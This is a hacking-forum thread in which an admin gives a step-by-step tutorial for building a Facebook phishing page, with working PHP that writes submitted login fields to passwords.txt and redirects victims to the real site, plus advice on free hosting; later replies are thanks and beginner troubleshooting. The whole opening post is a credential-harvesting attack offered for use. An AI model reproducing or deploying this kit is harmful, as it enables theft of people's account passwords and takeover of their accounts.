Lefora Free Forum
login join
Loading
41064 views

Facebook Phishing Tutorial

Page 1
1–11
Commoner - admin
50 posts

Today we are going to make a phisher for facebook.
1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important
9) make a new file in notepad, and put this code:
<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
10) now save it as lol.php and remember the save as file type to all files.
11) now, make a new file in notepad, dont write anything, save it as: passwords.txt
12) now upload all of them in www.t35.com
good luck and good phishing!

__________________
its my time!
kutong lupa - member
10 posts

na patched na ba 2?tnx

__________________
hack to learn not learn to hack :)
Gentry - moderator
158 posts

hmmm yay nka pzk din d2 wohoooooo. hehe wave sa lht 

__________________
~IN THE NAME OF THE HANDS SPIRIT OF THE LORD~
Gentry - moderator
158 posts

sir thanks po d2 hehe up

__________________
~IN THE NAME OF THE HANDS SPIRIT OF THE LORD~
kutong lupa - member
10 posts

pano ung step 6???? huhuhuhuhu

__________________
hack to learn not learn to hack :)
kutong lupa - member
10 posts

wla bang video jan?plssss tnx

__________________
hack to learn not learn to hack :)
kutong lupa - member
1 posts

pano yung step 1? san kukunin yung source?

kutong lupa - member
1 posts

the lol.php seems doesnt work...
can u explain wat to write on the action part??
thank you

kutong lupa - member
1 posts

INDI KO GETS !!! Xdddd

kutong lupa - member
1 posts

it should be index.html instead of index.php

kutong lupa - member
2 posts

astig tnx :)

Page 1
1–11

Locked Topic


You must be a member to post in this forum

Join Now!